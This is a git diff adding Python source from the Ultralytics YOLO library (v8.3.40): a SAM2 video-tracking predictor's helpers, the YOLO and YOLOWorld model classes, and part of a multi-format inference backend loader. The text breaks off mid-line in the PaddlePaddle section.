object to store inputs and outputs. + """ + obj_idx = self.inference_state["obj_id_to_idx"].get(obj_id, None) + if obj_idx is not None: + return obj_idx + + # This is a new object id not sent to the server before. We only allow adding + # new objects *before* the tracking starts. + allow_new_object = not self.inference_state["tracking_has_started"] + if allow_new_object: + # get the next object slot + obj_idx = len(self.inference_state["obj_id_to_idx"]) + self.inference_state["obj_id_to_idx"][obj_id] = obj_idx + self.inference_state["obj_idx_to_id"][obj_idx] = obj_id + self.inference_state["obj_ids"] = list(self.inference_state["obj_id_to_idx"]) + # set up input and output structures for this object + self.inference_state["point_inputs_per_obj"][obj_idx] = {} + self.inference_state["mask_inputs_per_obj"][obj_idx] = {} + self.inference_state["output_dict_per_obj"][obj_idx] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + self.inference_state["temp_output_dict_per_obj"][obj_idx] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + return obj_idx + else: + raise RuntimeError( + f"Cannot add new object id {obj_id} after tracking starts. " + f"All existing object ids: {self.inference_state['obj_ids']}. " + f"Please call 'reset_state' to restart from scratch." + ) + + def _run_single_frame_inference( + self, + output_dict, + frame_idx, + batch_size, + is_init_cond_frame, + point_inputs, + mask_inputs, + reverse, + run_mem_encoder, + prev_sam_mask_logits=None, + ): + """ + Run tracking on a single frame based on current inputs and previous memory. + + Args: + output_dict (Dict): The dictionary containing the output states of the tracking process. + frame_idx (int): The index of the current frame. + batch_size (int): The batch size for processing the frame. + is_init_cond_frame (bool): Indicates if the current frame is an initial conditioning frame. + point_inputs (Dict, Optional): Input points and their labels. Defaults to None. + mask_inputs (torch.Tensor, Optional): Input binary masks. Defaults to None. + reverse (bool): Indicates if the tracking should be performed in reverse order. + run_mem_encoder (bool): Indicates if the memory encoder should be executed. + prev_sam_mask_logits (torch.Tensor, Optional): Previous mask logits for the current object. Defaults to None. + + Returns: + current_out (dict): A dictionary containing the output of the tracking step, including updated features and predictions. + + Raises: + AssertionError: If both `point_inputs` and `mask_inputs` are provided, or neither is provided. + + Note: + - The method assumes that `point_inputs` and `mask_inputs` are mutually exclusive. + - The method retrieves image features using the `get_im_features` method. + - The `maskmem_pos_enc` is assumed to be constant across frames, hence only one copy is stored. + - The `fill_holes_in_mask_scores` function is commented out and currently unsupported due to CUDA extension requirements. + """ + # Retrieve correct image features + current_vision_feats, current_vision_pos_embeds, feat_sizes = self.get_im_features( + self.inference_state["im"], batch_size + ) + + # point and mask should not appear as input simultaneously on the same frame + assert point_inputs is None or mask_inputs is None + current_out = self.model.track_step( + frame_idx=frame_idx, + is_init_cond_frame=is_init_cond_frame, + current_vision_feats=current_vision_feats, + current_vision_pos_embeds=current_vision_pos_embeds, + feat_sizes=feat_sizes, + point_inputs=point_inputs, + mask_inputs=mask_inputs, + output_dict=output_dict, + num_frames=self.inference_state["num_frames"], + track_in_reverse=reverse, + run_mem_encoder=run_mem_encoder, + prev_sam_mask_logits=prev_sam_mask_logits, + ) + + maskmem_features = current_out["maskmem_features"] + if maskmem_features is not None: + current_out["maskmem_features"] = maskmem_features.to( + dtype=torch.float16, device=self.device, non_blocking=True + ) + # NOTE: Do not support the `fill_holes_in_mask_scores` function since it needs cuda extensions + # potentially fill holes in the predicted masks + # if self.fill_hole_area > 0: + # pred_masks = current_out["pred_masks"].to(self.device, non_blocking=True) + # pred_masks = fill_holes_in_mask_scores(pred_masks, self.fill_hole_area) + + # "maskmem_pos_enc" is the same across frames, so we only need to store one copy of it + current_out["maskmem_pos_enc"] = self._get_maskmem_pos_enc(current_out["maskmem_pos_enc"]) + return current_out + + def _get_maskmem_pos_enc(self, out_maskmem_pos_enc): + """ + Caches and manages the positional encoding for mask memory across frames and objects. + + This method optimizes storage by caching the positional encoding (`maskmem_pos_enc`) for + mask memory, which is constant across frames and objects, thus reducing the amount of + redundant information stored during an inference session. It checks if the positional + encoding has already been cached; if not, it caches a slice of the provided encoding. + If the batch size is greater than one, it expands the cached positional encoding to match + the current batch size. + + Args: + out_maskmem_pos_enc (List[torch.Tensor] or None): The positional encoding for mask memory. + Should be a list of tensors or None. + + Returns: + out_maskmem_pos_enc (List[torch.Tensor]): The positional encoding for mask memory, either cached or expanded. + + Note: + - The method assumes that `out_maskmem_pos_enc` is a list of tensors or None. + - Only a single object's slice is cached since the encoding is the same across objects. + - The method checks if the positional encoding has already been cached in the session's constants. + - If the batch size is greater than one, the cached encoding is expanded to fit the batch size. + """ + model_constants = self.inference_state["constants"] + # "out_maskmem_pos_enc" should be either a list of tensors or None + if out_maskmem_pos_enc is not None: + if "maskmem_pos_enc" not in model_constants: + assert isinstance(out_maskmem_pos_enc, list) + # only take the slice for one object, since it's same across objects + maskmem_pos_enc = [x[0:1].clone() for x in out_maskmem_pos_enc] + model_constants["maskmem_pos_enc"] = maskmem_pos_enc + else: + maskmem_pos_enc = model_constants["maskmem_pos_enc"] + # expand the cached maskmem_pos_enc to the actual batch size + batch_size = out_maskmem_pos_enc[0].size(0) + if batch_size > 1: + out_maskmem_pos_enc = [x.expand(batch_size, -1, -1, -1) for x in maskmem_pos_enc] + return out_maskmem_pos_enc + + def _consolidate_temp_output_across_obj( + self, + frame_idx, + is_cond=False, + run_mem_encoder=False, + ): + """ + Consolidates per-object temporary outputs into a single output for all objects. + + This method combines the temporary outputs for each object on a given frame into a unified + output. It fills in any missing objects either from the main output dictionary or leaves + placeholders if they do not exist in the main output. Optionally, it can re-run the memory + encoder after applying non-overlapping constraints to the object scores. + + Args: + frame_idx (int): The index of the frame for which to consolidate outputs. + is_cond (bool, Optional): Indicates if the frame is considered a conditioning frame. + Defaults to False. + run_mem_encoder (bool, Optional): Specifies whether to run the memory encoder after + consolidating the outputs. Defaults to False. + + Returns: + consolidated_out (dict): A consolidated output dictionary containing the combined results for all objects. + + Note: + - The method initializes the consolidated output with placeholder values for missing objects. + - It searches for outputs in both the temporary and main output dictionaries. + - If `run_mem_encoder` is True, it applies non-overlapping constraints and re-runs the memory encoder. + - The `maskmem_features` and `maskmem_pos_enc` are only populated when `run_mem_encoder` is True. + """ + batch_size = len(self.inference_state["obj_idx_to_id"]) + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + + # Initialize `consolidated_out`. Its "maskmem_features" and "maskmem_pos_enc" + # will be added when rerunning the memory encoder after applying non-overlapping + # constraints to object scores. Its "pred_masks" are prefilled with a large + # negative value (NO_OBJ_SCORE) to represent missing objects. + consolidated_out = { + "maskmem_features": None, + "maskmem_pos_enc": None, + "pred_masks": torch.full( + size=(batch_size, 1, self.imgsz[0] // 4, self.imgsz[1] // 4), + fill_value=-1024.0, + dtype=torch.float32, + device=self.device, + ), + "obj_ptr": torch.full( + size=(batch_size, self.model.hidden_dim), + fill_value=-1024.0, + dtype=torch.float32, + device=self.device, + ), + "object_score_logits": torch.full( + size=(batch_size, 1), + # default to 10.0 for object_score_logits, i.e. assuming the object is + # present as sigmoid(10)=1, same as in `predict_masks` of `MaskDecoder` + fill_value=10.0, + dtype=torch.float32, + device=self.device, + ), + } + for obj_idx in range(batch_size): + obj_temp_output_dict = self.inference_state["temp_output_dict_per_obj"][obj_idx] + obj_output_dict = self.inference_state["output_dict_per_obj"][obj_idx] + out = ( + obj_temp_output_dict[storage_key].get(frame_idx) + # If the object doesn't appear in "temp_output_dict_per_obj" on this frame, + # we fall back and look up its previous output in "output_dict_per_obj". + # We look up both "cond_frame_outputs" and "non_cond_frame_outputs" in + # "output_dict_per_obj" to find a previous output for this object. + or obj_output_dict["cond_frame_outputs"].get(frame_idx) + or obj_output_dict["non_cond_frame_outputs"].get(frame_idx) + ) + # If the object doesn't appear in "output_dict_per_obj" either, we skip it + # and leave its mask scores to the default scores (i.e. the NO_OBJ_SCORE + # placeholder above) and set its object pointer to be a dummy pointer. + if out is None: + # Fill in dummy object pointers for those objects without any inputs or + # tracking outcomes on this frame (only do it under `run_mem_encoder=True`, + # i.e. when we need to build the memory for tracking). + if run_mem_encoder: + # fill object pointer with a dummy pointer (based on an empty mask) + consolidated_out["obj_ptr"][obj_idx : obj_idx + 1] = self._get_empty_mask_ptr(frame_idx) + continue + # Add the temporary object output mask to consolidated output mask + consolidated_out["pred_masks"][obj_idx : obj_idx + 1] = out["pred_masks"] + consolidated_out["obj_ptr"][obj_idx : obj_idx + 1] = out["obj_ptr"] + + # Optionally, apply non-overlapping constraints on the consolidated scores and rerun the memory encoder + if run_mem_encoder: + high_res_masks = F.interpolate( + consolidated_out["pred_masks"], + size=self.imgsz, + mode="bilinear", + align_corners=False, + ) + if self.model.non_overlap_masks_for_mem_enc: + high_res_masks = self.model._apply_non_overlapping_constraints(high_res_masks) + consolidated_out["maskmem_features"], consolidated_out["maskmem_pos_enc"] = self._run_memory_encoder( + batch_size=batch_size, + high_res_masks=high_res_masks, + is_mask_from_pts=True, # these frames are what the user interacted with + object_score_logits=consolidated_out["object_score_logits"], + ) + + return consolidated_out + + def _get_empty_mask_ptr(self, frame_idx): + """ + Get a dummy object pointer based on an empty mask on the current frame. + + Args: + frame_idx (int): The index of the current frame for which to generate the dummy object pointer. + + Returns: + (torch.Tensor): A tensor representing the dummy object pointer generated from the empty mask. + """ + # Retrieve correct image features + current_vision_feats, current_vision_pos_embeds, feat_sizes = self.get_im_features(self.inference_state["im"]) + + # Feed the empty mask and image feature above to get a dummy object pointer + current_out = self.model.track_step( + frame_idx=frame_idx, + is_init_cond_frame=True, + current_vision_feats=current_vision_feats, + current_vision_pos_embeds=current_vision_pos_embeds, + feat_sizes=feat_sizes, + point_inputs=None, + # A dummy (empty) mask with a single object + mask_inputs=torch.zeros((1, 1, *self.imgsz), dtype=torch.float32, device=self.device), + output_dict={}, + num_frames=self.inference_state["num_frames"], + track_in_reverse=False, + run_mem_encoder=False, + prev_sam_mask_logits=None, + ) + return current_out["obj_ptr"] + + def _run_memory_encoder(self, batch_size, high_res_masks, object_score_logits, is_mask_from_pts): + """ + Run the memory encoder on masks. + + This is usually after applying non-overlapping constraints to object scores. Since their scores changed, their + memory also needs to be computed again with the memory encoder. + + Args: + batch_size (int): The batch size for processing the frame. + high_res_masks (torch.Tensor): High-resolution masks for which to compute the memory. + object_score_logits (torch.Tensor): Logits representing the object scores. + is_mask_from_pts (bool): Indicates if the mask is derived from point interactions. + + Returns: + (tuple[torch.Tensor, torch.Tensor]): A tuple containing the encoded mask features and positional encoding. + """ + # Retrieve correct image features + current_vision_feats, _, feat_sizes = self.get_im_features(self.inference_state["im"], batch_size) + maskmem_features, maskmem_pos_enc = self.model._encode_new_memory( + current_vision_feats=current_vision_feats, + feat_sizes=feat_sizes, + pred_masks_high_res=high_res_masks, + is_mask_from_pts=is_mask_from_pts, + object_score_logits=object_score_logits, + ) + + # "maskmem_pos_enc" is the same across frames, so we only need to store one copy of it + maskmem_pos_enc = self._get_maskmem_pos_enc(maskmem_pos_enc) + return maskmem_features.to(dtype=torch.float16, device=self.device, non_blocking=True), maskmem_pos_enc + + def _add_output_per_object(self, frame_idx, current_out, storage_key): + """ + Split a multi-object output into per-object output slices and add them into Output_Dict_Per_Obj. + + The resulting slices share the same tensor storage. + + Args: + frame_idx (int): The index of the current frame. + current_out (Dict): The current output dictionary containing multi-object outputs. + storage_key (str): The key used to store the output in the per-object output dictionary. + """ + maskmem_features = current_out["maskmem_features"] + assert maskmem_features is None or isinstance(maskmem_features, torch.Tensor) + + maskmem_pos_enc = current_out["maskmem_pos_enc"] + assert maskmem_pos_enc is None or isinstance(maskmem_pos_enc, list) + + for obj_idx, obj_output_dict in self.inference_state["output_dict_per_obj"].items(): + obj_slice = slice(obj_idx, obj_idx + 1) + obj_out = { + "maskmem_features": None, + "maskmem_pos_enc": None, + "pred_masks": current_out["pred_masks"][obj_slice], + "obj_ptr": current_out["obj_ptr"][obj_slice], + } + if maskmem_features is not None: + obj_out["maskmem_features"] = maskmem_features[obj_slice] + if maskmem_pos_enc is not None: + obj_out["maskmem_pos_enc"] = [x[obj_slice] for x in maskmem_pos_enc] + obj_output_dict[storage_key][frame_idx] = obj_out + + def _clear_non_cond_mem_around_input(self, frame_idx): + """ + Remove the non-conditioning memory around the input frame. + + When users provide correction clicks, the surrounding frames' non-conditioning memories can still contain outdated + object appearance information and could confuse the model. This method clears those non-conditioning memories + surrounding the interacted frame to avoid giving the model both old and new information about the object. + + Args: + frame_idx (int): The index of the current frame where user interaction occurred. + """ + r = self.model.memory_temporal_stride_for_eval + frame_idx_begin = frame_idx - r * self.model.num_maskmem + frame_idx_end = frame_idx + r * self.model.num_maskmem + for t in range(frame_idx_begin, frame_idx_end + 1): + self.inference_state["output_dict"]["non_cond_frame_outputs"].pop(t, None) + for obj_output_dict in self.inference_state["output_dict_per_obj"].values(): + obj_output_dict["non_cond_frame_outputs"].pop(t, None) diff --git a/2024.ultralytics/v8.3.40/models/yolo/model.py b/2024.ultralytics/v8.3.40/models/yolo/model.py new file mode 100644 index 0000000..6381960 --- /dev/null +++ b/2024.ultralytics/v8.3.40/models/yolo/model.py @@ -0,0 +1,111 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +from pathlib import Path + +from ultralytics.engine.model import Model +from ultralytics.models import yolo +from ultralytics.nn.tasks import ClassificationModel, DetectionModel, OBBModel, PoseModel, SegmentationModel, WorldModel +from ultralytics.utils import ROOT, yaml_load + + +class YOLO(Model): + """YOLO (You Only Look Once) object detection model.""" + + def __init__(self, model="yolo11n.pt", task=None, verbose=False): + """Initialize YOLO model, switching to YOLOWorld if model filename contains '-world'.""" + path = Path(model) + if "-world" in path.stem and path.suffix in {".pt", ".yaml", ".yml"}: # if YOLOWorld PyTorch model + new_instance = YOLOWorld(path, verbose=verbose) + self.__class__ = type(new_instance) + self.__dict__ = new_instance.__dict__ + else: + # Continue with default YOLO initialization + super().__init__(model=model, task=task, verbose=verbose) + + @property + def task_map(self): + """Map head to model, trainer, validator, and predictor classes.""" + return { + "classify": { + "model": ClassificationModel, + "trainer": yolo.classify.ClassificationTrainer, + "validator": yolo.classify.ClassificationValidator, + "predictor": yolo.classify.ClassificationPredictor, + }, + "detect": { + "model": DetectionModel, + "trainer": yolo.detect.DetectionTrainer, + "validator": yolo.detect.DetectionValidator, + "predictor": yolo.detect.DetectionPredictor, + }, + "segment": { + "model": SegmentationModel, + "trainer": yolo.segment.SegmentationTrainer, + "validator": yolo.segment.SegmentationValidator, + "predictor": yolo.segment.SegmentationPredictor, + }, + "pose": { + "model": PoseModel, + "trainer": yolo.pose.PoseTrainer, + "validator": yolo.pose.PoseValidator, + "predictor": yolo.pose.PosePredictor, + }, + "obb": { + "model": OBBModel, + "trainer": yolo.obb.OBBTrainer, + "validator": yolo.obb.OBBValidator, + "predictor": yolo.obb.OBBPredictor, + }, + } + + +class YOLOWorld(Model): + """YOLO-World object detection model.""" + + def __init__(self, model="yolov8s-world.pt", verbose=False) -> None: + """ + Initialize YOLOv8-World model with a pre-trained model file. + + Loads a YOLOv8-World model for object detection. If no custom class names are provided, it assigns default + COCO class names. + + Args: + model (str | Path): Path to the pre-trained model file. Supports *.pt and *.yaml formats. + verbose (bool): If True, prints additional information during initialization. + """ + super().__init__(model=model, task="detect", verbose=verbose) + + # Assign default COCO class names when there are no custom names + if not hasattr(self.model, "names"): + self.model.names = yaml_load(ROOT / "cfg/datasets/coco8.yaml").get("names") + + @property + def task_map(self): + """Map head to model, validator, and predictor classes.""" + return { + "detect": { + "model": WorldModel, + "validator": yolo.detect.DetectionValidator, + "predictor": yolo.detect.DetectionPredictor, + "trainer": yolo.world.WorldTrainer, + } + } + + def set_classes(self, classes): + """ + Set classes. + + Args: + classes (List(str)): A list of categories i.e. ["person"]. + """ + self.model.set_classes(classes) + # Remove background if it's given + background = " " + if background in classes: + classes.remove(background) + self.model.names = classes + + # Reset method class names + # self.predictor = None # reset predictor otherwise old names remain + if self.predictor: + self.predictor.model.names = classes diff --git a/2024.ultralytics/v8.3.40/nn/autobackend.py b/2024.ultralytics/v8.3.40/nn/autobackend.py new file mode 100644 index 0000000..60b9f63 --- /dev/null +++ b/2024.ultralytics/v8.3.40/nn/autobackend.py @@ -0,0 +1,767 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import ast +import json +import platform +import zipfile +from collections import OrderedDict, namedtuple +from pathlib import Path + +import cv2 +import numpy as np +import torch +import torch.nn as nn +from PIL import Image + +from ultralytics.utils import ARM64, IS_JETSON, IS_RASPBERRYPI, LINUX, LOGGER, ROOT, yaml_load +from ultralytics.utils.checks import check_requirements, check_suffix, check_version, check_yaml +from ultralytics.utils.downloads import attempt_download_asset, is_url + + +def check_class_names(names): + """ + Check class names. + + Map imagenet class codes to human-readable names if required. Convert lists to dicts. + """ + if isinstance(names, list): # names is a list + names = dict(enumerate(names)) # convert to dict + if isinstance(names, dict): + # Convert 1) string keys to int, i.e. '0' to 0, and non-string values to strings, i.e. True to 'True' + names = {int(k): str(v) for k, v in names.items()} + n = len(names) + if max(names.keys()) >= n: + raise KeyError( + f"{n}-class dataset requires class indices 0-{n - 1}, but you have invalid class indices " + f"{min(names.keys())}-{max(names.keys())} defined in your dataset YAML." + ) + if isinstance(names[0], str) and names[0].startswith("n0"): # imagenet class codes, i.e. 'n01440764' + names_map = yaml_load(ROOT / "cfg/datasets/ImageNet.yaml")["map"] # human-readable names + names = {k: names_map[v] for k, v in names.items()} + return names + + +def default_class_names(data=None): + """Applies default class names to an input YAML file or returns numerical class names.""" + if data: + try: + return yaml_load(check_yaml(data))["names"] + except Exception: + pass + return {i: f"class{i}" for i in range(999)} # return default if above errors + + +class AutoBackend(nn.Module): + """ + Handles dynamic backend selection for running inference using Ultralytics YOLO models. + + The AutoBackend class is designed to provide an abstraction layer for various inference engines. It supports a wide + range of formats, each with specific naming conventions as outlined below: + + Supported Formats and Naming Conventions: + | Format | File Suffix | + |-----------------------|-------------------| + | PyTorch | *.pt | + | TorchScript | *.torchscript | + | ONNX Runtime | *.onnx | + | ONNX OpenCV DNN | *.onnx (dnn=True) | + | OpenVINO | *openvino_model/ | + | CoreML | *.mlpackage | + | TensorRT | *.engine | + | TensorFlow SavedModel | *_saved_model/ | + | TensorFlow GraphDef | *.pb | + | TensorFlow Lite | *.tflite | + | TensorFlow Edge TPU | *_edgetpu.tflite | + | PaddlePaddle | *_paddle_model/ | + | MNN | *.mnn | + | NCNN | *_ncnn_model/ | + + This class offers dynamic backend switching capabilities based on the input model format, making it easier to deploy + models across various platforms. + """ + + @torch.no_grad() + def __init__( + self, + weights="yolo11n.pt", + device=torch.device("cpu"), + dnn=False, + data=None, + fp16=False, + batch=1, + fuse=True, + verbose=True, + ): + """ + Initialize the AutoBackend for inference. + + Args: + weights (str): Path to the model weights file. Defaults to 'yolov8n.pt'. + device (torch.device): Device to run the model on. Defaults to CPU. + dnn (bool): Use OpenCV DNN module for ONNX inference. Defaults to False. + data (str | Path | optional): Path to the additional data.yaml file containing class names. Optional. + fp16 (bool): Enable half-precision inference. Supported only on specific backends. Defaults to False. + batch (int): Batch-size to assume for inference. + fuse (bool): Fuse Conv2D + BatchNorm layers for optimization. Defaults to True. + verbose (bool): Enable verbose logging. Defaults to True. + """ + super().__init__() + w = str(weights[0] if isinstance(weights, list) else weights) + nn_module = isinstance(weights, torch.nn.Module) + ( + pt, + jit, + onnx, + xml, + engine, + coreml, + saved_model, + pb, + tflite, + edgetpu, + tfjs, + paddle, + mnn, + ncnn, + imx, + triton, + ) = self._model_type(w) + fp16 &= pt or jit or onnx or xml or engine or nn_module or triton # FP16 + nhwc = coreml or saved_model or pb or tflite or edgetpu # BHWC formats (vs torch BCWH) + stride = 32 # default stride + model, metadata, task = None, None, None + + # Set device + cuda = torch.cuda.is_available() and device.type != "cpu" # use CUDA + if cuda and not any([nn_module, pt, jit, engine, onnx]): # GPU dataloader formats + device = torch.device("cpu") + cuda = False + + # Download if not local + if not (pt or triton or nn_module): + w = attempt_download_asset(w) + + # In-memory PyTorch model + if nn_module: + model = weights.to(device) + if fuse: + model = model.fuse(verbose=verbose) + if hasattr(model, "kpt_shape"): + kpt_shape = model.kpt_shape # pose-only + stride = max(int(model.stride.max()), 32) # model stride + names = model.module.names if hasattr(model, "module") else model.names # get class names + model.half() if fp16 else model.float() + self.model = model # explicitly assign for to(), cpu(), cuda(), half() + pt = True + + # PyTorch + elif pt: + from ultralytics.nn.tasks import attempt_load_weights + + model = attempt_load_weights( + weights if isinstance(weights, list) else w, device=device, inplace=True, fuse=fuse + ) + if hasattr(model, "kpt_shape"): + kpt_shape = model.kpt_shape # pose-only + stride = max(int(model.stride.max()), 32) # model stride + names = model.module.names if hasattr(model, "module") else model.names # get class names + model.half() if fp16 else model.float() + self.model = model # explicitly assign for to(), cpu(), cuda(), half() + + # TorchScript + elif jit: + LOGGER.info(f"Loading {w} for TorchScript inference...") + extra_files = {"config.txt": ""} # model metadata + model = torch.jit.load(w, _extra_files=extra_files, map_location=device) + model.half() if fp16 else model.float() + if extra_files["config.txt"]: # load metadata dict + metadata = json.loads(extra_files["config.txt"], object_hook=lambda x: dict(x.items())) + + # ONNX OpenCV DNN + elif dnn: + LOGGER.info(f"Loading {w} for ONNX OpenCV DNN inference...") + check_requirements("opencv-python>=4.5.4") + net = cv2.dnn.readNetFromONNX(w) + + # ONNX Runtime and IMX + elif onnx or imx: + LOGGER.info(f"Loading {w} for ONNX Runtime inference...") + check_requirements(("onnx", "onnxruntime-gpu" if cuda else "onnxruntime")) + if IS_RASPBERRYPI or IS_JETSON: + # Fix 'numpy.linalg._umath_linalg' has no attribute '_ilp64' for TF SavedModel on RPi and Jetson + check_requirements("numpy==1.23.5") + import onnxruntime + + providers = onnxruntime.get_available_providers() + if not cuda and "CUDAExecutionProvider" in providers: + providers.remove("CUDAExecutionProvider") + elif cuda and "CUDAExecutionProvider" not in providers: + LOGGER.warning("WARNING ⚠️ Failed to start ONNX Runtime session with CUDA. Falling back to CPU...") + device = torch.device("cpu") + cuda = False + LOGGER.info(f"Preferring ONNX Runtime {providers[0]}") + if onnx: + session = onnxruntime.InferenceSession(w, providers=providers) + else: + check_requirements( + ["model-compression-toolkit==2.1.1", "sony-custom-layers[torch]==0.2.0", "onnxruntime-extensions"] + ) + w = next(Path(w).glob("*.onnx")) + LOGGER.info(f"Loading {w} for ONNX IMX inference...") + import mct_quantizers as mctq + from sony_custom_layers.pytorch.object_detection import nms_ort # noqa + + session = onnxruntime.InferenceSession( + w, mctq.get_ort_session_options(), providers=["CPUExecutionProvider"] + ) + task = "detect" + + output_names = [x.name for x in session.get_outputs()] + metadata = session.get_modelmeta().custom_metadata_map + dynamic = isinstance(session.get_outputs()[0].shape[0], str) + if not dynamic: + io = session.io_binding() + bindings = [] + for output in session.get_outputs(): + y_tensor = torch.empty(output.shape, dtype=torch.float16 if fp16 else torch.float32).to(device) + io.bind_output( + name=output.name, + device_type=device.type, + device_id=device.index if cuda else 0, + element_type=np.float16 if fp16 else np.float32, + shape=tuple(y_tensor.shape), + buffer_ptr=y_tensor.data_ptr(), + ) + bindings.append(y_tensor) + + # OpenVINO + elif xml: + LOGGER.info(f"Loading {w} for OpenVINO inference...") + check_requirements("openvino>=2024.0.0") + import openvino as ov + + core = ov.Core() + w = Path(w) + if not w.is_file(): # if not *.xml + w = next(w.glob("*.xml")) # get *.xml file from *_openvino_model dir + ov_model = core.read_model(model=str(w), weights=w.with_suffix(".bin")) + if ov_model.get_parameters()[0].get_layout().empty: + ov_model.get_parameters()[0].set_layout(ov.Layout("NCHW")) + + # OpenVINO inference modes are 'LATENCY', 'THROUGHPUT' (not recommended), or 'CUMULATIVE_THROUGHPUT' + inference_mode = "CUMULATIVE_THROUGHPUT" if batch > 1 else "LATENCY" + LOGGER.info(f"Using OpenVINO {inference_mode} mode for batch={batch} inference...") + ov_compiled_model = core.compile_model( + ov_model, + device_name="AUTO", # AUTO selects best available device, do not modify + config={"PERFORMANCE_HINT": inference_mode}, + ) + input_name = ov_compiled_model.input().get_any_name() + metadata = w.parent / "metadata.yaml" + + # TensorRT + elif engine: + LOGGER.info(f"Loading {w} for TensorRT inference...") + try: + import tensorrt as trt # noqa https://developer.nvidia.com/nvidia-tensorrt-download + except ImportError: + if LINUX: + check_requirements("tensorrt>7.0.0,!=10.1.0") + import tensorrt as trt # noqa + check_version(trt.__version__, ">=7.0.0", hard=True) + check_version(trt.__version__, "!=10.1.0", msg="https://github.com/ultralytics/ultralytics/pull/14239") + if device.type == "cpu": + device = torch.device("cuda:0") + Binding = namedtuple("Binding", ("name", "dtype", "shape", "data", "ptr")) + logger = trt.Logger(trt.Logger.INFO) + # Read file + with open(w, "rb") as f, trt.Runtime(logger) as runtime: + try: + meta_len = int.from_bytes(f.read(4), byteorder="little") # read metadata length + metadata = json.loads(f.read(meta_len).decode("utf-8")) # read metadata + except UnicodeDecodeError: + f.seek(0) # engine file may lack embedded Ultralytics metadata + model = runtime.deserialize_cuda_engine(f.read()) # read engine + + # Model context + try: + context = model.create_execution_context() + except Exception as e: # model is None + LOGGER.error(f"ERROR: TensorRT model exported with a different version than {trt.__version__}\n") + raise e + + bindings = OrderedDict() + output_names = [] + fp16 = False # default updated below + dynamic = False + is_trt10 = not hasattr(model, "num_bindings") + num = range(model.num_io_tensors) if is_trt10 else range(model.num_bindings) + for i in num: + if is_trt10: + name = model.get_tensor_name(i) + dtype = trt.nptype(model.get_tensor_dtype(name)) + is_input = model.get_tensor_mode(name) == trt.TensorIOMode.INPUT + if is_input: + if -1 in tuple(model.get_tensor_shape(name)): + dynamic = True + context.set_input_shape(name, tuple(model.get_tensor_profile_shape(name, 0)[1])) + if dtype == np.float16: + fp16 = True + else: + output_names.append(name) + shape = tuple(context.get_tensor_shape(name)) + else: # TensorRT < 10.0 + name = model.get_binding_name(i) + dtype = trt.nptype(model.get_binding_dtype(i)) + is_input = model.binding_is_input(i) + if model.binding_is_input(i): + if -1 in tuple(model.get_binding_shape(i)): # dynamic + dynamic = True + context.set_binding_shape(i, tuple(model.get_profile_shape(0, i)[1])) + if dtype == np.float16: + fp16 = True + else: + output_names.append(name) + shape = tuple(context.get_binding_shape(i)) + im = torch.from_numpy(np.empty(shape, dtype=dtype)).to(device) + bindings[name] = Binding(name, dtype, shape, im, int(im.data_ptr())) + binding_addrs = OrderedDict((n, d.ptr) for n, d in bindings.items()) + batch_size = bindings["images"].shape[0] # if dynamic, this is instead max batch size + + # CoreML + elif coreml: + LOGGER.info(f"Loading {w} for CoreML inference...") + import coremltools as ct + + model = ct.models.MLModel(w) + metadata = dict(model.user_defined_metadata) + + # TF SavedModel + elif saved_model: + LOGGER.info(f"Loading {w} for TensorFlow SavedModel inference...") + import tensorflow as tf + + keras = False # assume TF1 saved_model + model = tf.keras.models.load_model(w) if keras else tf.saved_model.load(w) + metadata = Path(w) / "metadata.yaml" + + # TF GraphDef + elif pb: # https://www.tensorflow.org/guide/migrate#a_graphpb_or_graphpbtxt + LOGGER.info(f"Loading {w} for TensorFlow GraphDef inference...") + import tensorflow as tf + + from ultralytics.engine.exporter import gd_outputs + + def wrap_frozen_graph(gd, inputs, outputs): + """Wrap frozen graphs for deployment.""" + x = tf.compat.v1.wrap_function(lambda: tf.compat.v1.import_graph_def(gd, name=""), []) # wrapped + ge = x.graph.as_graph_element + return x.prune(tf.nest.map_structure(ge, inputs), tf.nest.map_structure(ge, outputs)) + + gd = tf.Graph().as_graph_def() # TF GraphDef + with open(w, "rb") as f: + gd.ParseFromString(f.read()) + frozen_func = wrap_frozen_graph(gd, inputs="x:0", outputs=gd_outputs(gd)) + try: # find metadata in SavedModel alongside GraphDef + metadata = next(Path(w).resolve().parent.rglob(f"{Path(w).stem}_saved_model*/metadata.yaml")) + except StopIteration: + pass + + # TFLite or TFLite Edge TPU + elif tflite or edgetpu: # https://www.tensorflow.org/lite/guide/python#install_tensorflow_lite_for_python + try: # https://coral.ai/docs/edgetpu/tflite-python/#update-existing-tf-lite-code-for-the-edge-tpu + from tflite_runtime.interpreter import Interpreter, load_delegate + except ImportError: + import tensorflow as tf + + Interpreter, load_delegate = tf.lite.Interpreter, tf.lite.experimental.load_delegate + if edgetpu: # TF Edge TPU https://coral.ai/software/#edgetpu-runtime + device = device[3:] if str(device).startswith("tpu") else ":0" + LOGGER.info(f"Loading {w} on device {device[1:]} for TensorFlow Lite Edge TPU inference...") + delegate = {"Linux": "libedgetpu.so.1", "Darwin": "libedgetpu.1.dylib", "Windows": "edgetpu.dll"}[ + platform.system() + ] + interpreter = Interpreter( + model_path=w, + experimental_delegates=[load_delegate(delegate, options={"device": device})], + ) + device = "cpu" # Required, otherwise PyTorch will try to use the wrong device + else: # TFLite + LOGGER.info(f"Loading {w} for TensorFlow Lite inference...") + interpreter = Interpreter(model_path=w) # load TFLite model + interpreter.allocate_tensors() # allocate + input_details = interpreter.get_input_details() # inputs + output_details = interpreter.get_output_details() # outputs + # Load metadata + try: + with zipfile.ZipFile(w, "r") as model: + meta_file = model.namelist()[0] + metadata = ast.literal_eval(model.read(meta_file).decode("utf-8")) + except zipfile.BadZipFile: + pass + + # TF.js + elif tfjs: + raise NotImplementedError("YOLOv8 TF.js inference is not currently supported.") + + # PaddlePaddle + elif paddle: + LOGGER.info(f"Loading {w} for PaddlePaddle inference...") + check_requirements("paddlepaddle-gpu" if cuda else "paddlepaddle") + import paddle.inference as pdi # noqa + + w = Path(w) + if not w.is_file(): # if not *.pdmodel + w = next(w.rglob("*.pdmodel")) # get *.pdmodel file from *_paddle_model dir + config = pdi.Config(str(w), str(w.with_suffix(".pdiparams"))) + if cuda: + config.enable_use_gpu(memory_pool_init_size_mb=2048, device_id=0) + predictor = pdi.create_predictor(config) + input_handle = 